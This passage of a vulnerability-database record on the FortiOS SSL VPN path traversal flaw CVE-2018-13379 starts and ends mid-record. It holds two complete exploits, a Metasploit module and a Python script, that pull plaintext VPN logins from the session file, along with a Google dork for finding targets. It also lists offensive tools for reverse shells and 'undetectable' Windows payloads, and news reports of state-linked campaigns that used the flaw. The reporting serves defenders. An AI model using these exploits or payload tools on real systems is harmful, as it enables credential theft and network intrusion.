](<https://github.com/Kkevsterrr/backdoorme>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-11T22:33:00", "type": "kitploit", "title": "BackdoorMe - Powerful Auto-Backdooring Utility", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-11T22:33:00", "id": "KITPLOIT:7070039119688478663", "href": "http://www.kitploit.com/2016/01/backdoorme-powerful-auto-backdooring.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-02T23:29:09", "description": "[  ](<https://3.bp.blogspot.com/-6SwNRV-BvEg/Vo7yQzPl24I/AAAAAAAAFAc/82tyYySqf7M/s1600/Winpayloads.png>)\n\n \nUndetectable Windows Payload Generation with extras Running on Python2.7 \n \n\n\n## Getting Started \n \n \n git clone https://github.com/Charliedean/Winpayloads\n cd WinPayloads\n sudo ./setup.sh\n python WinPayloads.py\n\n## Menu \n \n \n [1] Windows Reverse Shell(Stageless) [Shellter]\n [2] Windows Reverse Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence]\n [3] Windows Bind Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence]\n [4] Windows Reverse Meterpreter(Raw Shellcode) [Base64 Encode]\n\n \n\n\n** [ \n](<https://github.com/Charliedean/Winpayloads>) **\n\n** [ Download Winpayloads ](<https://github.com/Charliedean/Winpayloads>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-07T23:22:05", "type": "kitploit", "title": "Winpayloads - Undetectable Windows Payload Generation", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-07T23:22:05", "id": "KITPLOIT:2686676167278919598", "href": "http://www.kitploit.com/2016/01/winpayloads-undetectable-windows.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2019-12-04T19:59:03", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2019-08-19T00:00:00", "type": "zdt", "title": "FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "1337DAY-ID-33133", "href": "https://0day.today/exploit/description/33133", "sourceData": "# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.\r\n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\"\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.fortinet.com/\r\n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html\r\n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\r\n# Tested on: 5.6.6\r\n# CVE : CVE-2018-13379\r\n\r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File \r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'SSL VPN FortiOs - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tFortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.\r\n\t\t\t\tThis exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).\r\n\t\t\t\tThis vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ 'lynx (Carlos Vieira)' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing binary file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ow crap, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\t \t\r\n\t\tend\t\r\n\t\tfileObj.close\t\r\n\tend\r\nend\n\n# 0day.today [2019-12-04] #", "sourceHref": "https://0day.today/exploit/33133", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-04T19:56:15", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2019-08-19T00:00:00", "type": "zdt", "title": "FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Exploit (2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "1337DAY-ID-33134", "href": "https://0day.today/exploit/description/33134", "sourceData": "# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.\r\n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\"\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.fortinet.com/\r\n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html\r\n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\r\n# Tested on: 5.6.6\r\n# CVE : CVE-2018-13379\r\n\r\n# Exploit SSLVPN Fortinet - FortiOs\r\n#!/usr/bin/env python\r\nimport requests, sys, time\r\nimport urllib3\r\nurllib3.disable_warnings()\r\n\r\n\r\ndef leak(host, port):\r\n\tprint(\"[!] Leak information...\")\r\n\ttry:\r\n\t\turl = \"https://\"+host+\":\"+port+\"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\"\r\n\t\theaders = {\"User-Agent\": \"Mozilla/5.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"}\t\t\r\n\t\tr=requests.get(url, headers=headers, verify=False, stream=True)\r\n\t\timg=r.raw.read()\r\n\t\tif \"var fgt_lang =\" in str(img):\r\n\t\t\twith open(\"sslvpn_websession_\"+host+\".dat\", 'w') as f:\r\n\t\t\t\tf.write(img)\t\t\r\n\t\t\tprint(\"[>] Save to file ....\")\r\n\t\t\tparse(host)\r\n\t\t\tprint(\"\\n\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\texcept requests.exceptions.ConnectionError:\r\n\t\treturn False\r\ndef is_character_printable(s):\r\n\treturn all((ord(c) < 127) and (ord(c) >= 32) for c in s)\r\n\r\ndef is_printable(byte):\r\n\tif is_character_printable(byte):\r\n \t\treturn byte\r\n \telse:\r\n \t\treturn '.' \r\n\r\ndef read_bytes(host, chunksize=8192):\r\n\tprint(\"[>] Read bytes from > \" + \"sslvpn_websession\"+host+\".dat\")\r\n\twith open(\"sslvpn_websession_\"+host+\".dat\", \"rb\") as f:\r\n \t\twhile True:\r\n \t\tchunk = f.read(chunksize)\r\n \t\tif chunk:\r\n \t\t\tfor b in chunk:\r\n \t\t\t\tyield b\r\n \t\telse:\r\n \t\t\tbreak\r\ndef parse(host):\r\n print(\"[!] Parsing Information...\")\r\n memory_address = 0\r\n ascii_string = \"\"\r\n for byte in read_bytes(host):\r\n \tascii_string = ascii_string + is_printable(byte)\r\n\tif memory_address%61 == 60:\r\n\t\tif ascii_string!=\".............................................................\":\r\n\t \t\tprint ascii_string\r\n\t \tascii_string = \"\"\r\n\tmemory_address = memory_address + 1\r\n\r\ndef check(host, port):\r\n print(\"[!] Check vuln...\")\r\n uri = \"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\"\r\n try:\r\n r = requests.get(\"https://\" + host + \":\" + port + uri, verify=False)\r\n if(r.status_code == 200):\r\n return True\r\n elif(r.status_code == 404):\r\n return False\r\n else:\r\n return False\r\n except:\r\n return False\r\ndef main(host, port):\r\n print(\"[+] Start exploiting....\")\r\n vuln = check(host, port)\r\n if(vuln):\r\n print(\"[+] Target is vulnerable!\")\r\n bin_file = leak(host, port)\r\n else:\r\n print(\"[X] Target not vulnerable.\")\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if(len(sys.argv) < 3):\r\n print(\"Use: python {} ip/dns port\".format(sys.argv[0]))\r\n else:\r\n host = sys.argv[1]\r\n port = sys.argv[2]\r\n main(host, port)\n\n# 0day.today [2019-12-04] #", "sourceHref": "https://0day.today/exploit/33134", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-cKikIN2o4zA/YK5pX-ibrqI/AAAAAAAACpU/sp4zF_WZEkMPqmuvXXvmNfX9jnVnVLdkwCLcBGAsYHQ/s0/data-wiper-ransomware.jpg>)\n\nResearchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities at least since December 2020 that camouflage the malicious activity as ransomware extortions.\n\nCybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker \"Agrius.\"\n\n\"An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets,\" the researchers [said](<https://assets.sentinelone.com/sentinellabs/evol-agrius>). \"The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups.\"\n\nThe group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become a fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a second wiper named DEADWOOD (aka Detbosit) after a logic flaw in early versions of Apostle prevented data from being erased.\n\nIn addition, the Agrius actors drop a .NET implant called IPsec Helper that can be used to exfiltrate data or deploy additional malware. What's more, the threat actor's tactics have also witnessed a shift from espionage to demanding ransoms from its victims to recover access to encrypted data, only to have them actually destroyed in a wiping attack.\n\n[](<https://thehackernews.com/images/-bw6vJJdJmK8/YK5m41wm5XI/AAAAAAAACpM/hW2cbdRji0Qr191iBSXgSHzTAfh_i9ERwCLcBGAsYHQ/s0/vpn.jpg>)\n\nBesides using ProtonVPN for anonymization, the Agrius attack cycle leverages 1-day vulnerabilities in web-based applications, including [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), to gain an initial foothold and subsequently deliver ASPXSpy web shells to maintain remote access to compromised systems and run arbitrary commands.\n\nIf anything, the research adds to evidence that state-sponsored actors with ties to the Iranian government are increasingly looking at ransomware operations as a subterfuge technique to mimic other financially motivated cybercriminal ransomware groups.\n\nRecently leaked documents by Lab Dookhtegan revealed an initiative called \"[Project Signal](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>)'' that linked Iran's Islamic Revolutionary Guard Corps to a ransomware operation through a contracting company.\n\n\"While being disruptive and effective, ransomware activities provide deniability, allowing states to send a message without taking direct blame,\" the researchers said. \"Similar strategies have been used with devastating effect by [other nation-state sponsored actors](<https://thehackernews.com/2017/06/petya-ransomware-decryption-key.html>).\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T15:30:00", "type": "thn", "title": "Data Wiper Malware Disguised As Ransomware Targets Israeli Entities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-07T05:01:48", "id": "THN:EAEDDF531EB90375B350E1580DE3DD02", "href": "https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg6QgmIugjApGsSp_v-DgmrWh7TAwmgc2-q7he3aZA3LmwS3p9FJchpB4duBUG7J8wctZHQGDUg2jvObX6Lto5BZUAMDX2xH7JG8EDRyjRmSLmiaQl8rgHeOaQhlEL7oZDJgxSQOX8XlQiMQHLt36bKZAAJU2uaq2rKhruJOh9LNq60PhKcZc8Lj6Dn/s728-e100/hackers.jpg>)\n\nMicrosoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium.\n\nIn addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created by Polonium andd that it notified affected organizations.\n\n\"The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques,\" MSTIC [assessed](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) with \"moderate confidence.\"\n\nThe adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022.\n\nTargets of interest included entities in the manufacturing, IT, transportation, defense, government, agriculture, financial, and healthcare sectors, with one cloud service provider compromised to target a downstream aviation company and law firm in what's a case of a supply chain attack.\n\nIn a vast majority of the cases, initial access is believed to have been obtained by exploiting a path traversal flaw in Fortinet appliances ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)), abusing it to drop custom PowerShell implants like CreepySnail that establish connections to a command-and-control (C2) server for follow-on actions.\n\nAttack chains mounted by the actor have involved the use of custom tools that leverage legitimate cloud services such as OneDrive and Dropbox accounts for C2 with its victims using malicious tools dubbed CreepyDrive and CreepyBox.\n\n\"The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run,\" the researchers said.\n\nThis is not the first time Iranian threat actors have taken advantage of cloud services. In October 2021, Cybereason [disclosed](<https://thehackernews.com/2021/10/iranian-hackers-abuse-dropbox-in.html>) an attack campaign staged by a group called MalKamak that used Dropbox for C2 communications in an attempt to stay under the radar.\n\nAdditionally, MSTIC noted that multiple victims that were compromised by Polonium were previously targeted by another Iranian group called [MuddyWater](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) (aka Mercury), which has been characterized by the U.S. Cyber Command as a \"subordinate element\" within MOIS.\n\nThe victim overlaps lend credence to earlier reports that MuddyWater is a \"[conglomerate](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>)\" of multiple teams along the lines of Winnti (China) and the Lazarus Group (North Korea).\n\nTo counter such threats, customers are advised to enable multi-factor authentication as well as review and audit partner relationships to minimize any unnecessary permissions.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:19:00", "type": "thn", "title": "Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-04T08:43:20", "id": "THN:8BA951AD00E17C72D6321234DBF80D19", "href": "https://thehackernews.com/2022/06/microsoft-blocks-iran-linked-lebanese.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:22", "description": "[](<https://thehackernews.com/images/-wqhJpW-QhTc/YG79n_lop2I/AAAAAAAACNY/ZnMOyKz8e6Adj5Hy8a5WXa_-MbqnDgRLwCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nUnpatched Fortinet VPN devices are being targeted in a series of attacks against industrial enterprises in Europe to deploy a new strain of ransomware called \"Cring\" inside corporate networks.\n\nAt least one of the hacking incidents led to the temporary shutdown of a production site, said cybersecurity firm Kaspersky in a report published on Wednesday, without publicly naming the victim.\n\nThe attacks happened in the first quarter of 2021, between January and March.\n\n\"Various details of the attack indicate that the attackers had carefully analyzed the infrastructure of the targeted organization and prepared their own infrastructure and toolset based on the information collected at the reconnaissance stage,\" [said](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) Vyacheslav Kopeytsev, a security researcher at Kaspersky ICS CERT.\n\nThe disclosure comes days after the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) of advanced persistent threat (APT) actors actively scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379, among others.\n\n\"APT actors may use these vulnerabilities or other common exploitation techniques to gain initial access to multiple government, commercial, and technology services. Gaining initial access pre-positions the APT actors to conduct future attacks,\" the agency said.\n\n[](<https://thehackernews.com/images/-5QwYhR-6pQ0/YG794Oq_4BI/AAAAAAAACNg/cbtbheKh0Z4gm3R1vdQ6cdPUmQT6WjUNwCLcBGAsYHQ/s0/hack.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) concerns a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext.\n\nAlthough patches for the vulnerability were released in [May 2019](<https://www.fortiguard.com/psirt/FG-IR-18-384>), Fortinet said last November that it identified a \"[large number](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\" of VPN appliances that remained unpatched, while also cautioning that IP addresses of those internet-facing vulnerable devices were being sold on the dark web.\n\nIn a statement shared with The Hacker News, Fortinet said it had urged customers to upgrade their appliances \"on multiple occasions in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), and again in [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>)\" following the May 2019 fix. \"If customers have not done so, we urge them to immediately implement the upgrade and mitigations,\" the company said.\n\nThe attacks aimed at European businesses were no different, according to Kaspersky's incident response, which found that the deployment of Cring ransomware involved the exploitation of CVE-2018-13379 to gain access to the target networks.\n\n\"Some time prior to the main phase of the operation, the attackers performed test connections to the VPN Gateway, apparently in order to make sure that the stolen user credentials for the VPN were still valid,\" Kaspersky researchers said.\n\nUpon gaining access, the adversaries are said to have used the Mimikatz utility to siphon account credentials of Windows users who had previously logged in to the compromised system, then utilizing them to break into the domain administrator account, move laterally across the network, and eventually deploy the Cring ransomware on each machine remotely using the Cobalt Strike framework.\n\n[Cring](<https://malpedia.caad.fkie.fraunhofer.de/details/win.cring>), a nascent strain that was first observed in January 2021 by telecom provider Swisscom, encrypts specific files on the devices using strong encryption algorithms after removing traces of all backup files and terminating Microsoft Office and Oracle Database processes. Following successful encryption, it drops a ransom note demanding payment of two bitcoins.\n\n[](<https://thehackernews.com/images/-zg8HygZ73Eo/YG7-LtYB1JI/AAAAAAAACNo/wj8rvRY9io4E_QWg643XIdI94kejG4D5gCLcBGAsYHQ/s0/cybersecurity.jpg>)\n\nWhat's more, the threat actor was careful to hide their activity by disguising the malicious PowerShell scripts under the name \"kaspersky\" to evade detection and ensured that the server hosting the ransomware payload only responded to requests coming in from European countries.\n\n\"An analysis of the attackers' activity demonstrates that, based on the results of the reconnaissance performed on the attacked organization's network, they chose to encrypt those servers which the attackers believed would cause the greatest damage to the enterprise's operations if lost,\" Kopeytsev [said](<https://usa.kaspersky.com/about/press-releases/2021_na-cring-ransomware-infects-industrial-targets-through-vulnerability-in-vpn-servers>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-08T13:12:00", "type": "thn", "title": "Hackers Exploit Unpatched VPNs to Install Ransomware on Industrial Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-13T05:39:44", "id": "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "href": "https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:37:32", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgcW-6sY33kcH0dmBIKaK9mpaBaPRVIHpXHjT6Hgy_cMiHxlaNJfxuW1eMvQDiHyvzDLYVJGlJVA2b_pyL6m02QdpItx8VmJbN4PgH539vr05iJNN2nhAyDflMWDr-NbNmKaPQvhSn59trm4goPShyfhF5aIO8nNOTMAMBWoNZZ5zvA73ryI_wfVzbT>)\n\nA \"potentially destructive actor\" aligned with the government of Iran is actively exploiting the well-known [Log4j vulnerability](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) to infect unpatched VMware Horizon servers with ransomware.\n\nCybersecurity firm SentinelOne dubbed the group \"**TunnelVision**\" owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker [Phosphorus](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) as well as Charming Kitten and Nemesis Kitten.\n\n\"TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,\" SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky [said](<https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/>) in a report, with the intrusions detected in the Middle East and the U.S.\n\nAlso observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw ([CVE-2018-13379](<https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html>)) and the Microsoft Exchange [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) vulnerability to gain initial access into the target networks for post-exploitation.\n\n\"TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,\" the researchers said.\n\nThe PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that's capable of gathering credentials and executing reconnaissance commands.\n\nSentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called [PowerLess](<https://thehackernews.com/2022/02/iranian-hackers-using-new-powershell.html>) that was disclosed by Cybereason researchers earlier this month.\n\nAll through the activity, the threat actor is said to have utilized a GitHub repository known as \"VmWareHorizon\" under the username \"protections20\" to host the malicious payloads.\n\nThe cybersecurity company said it's associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that \"there is at present insufficient data to treat them as identical to any of the aforementioned attributions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 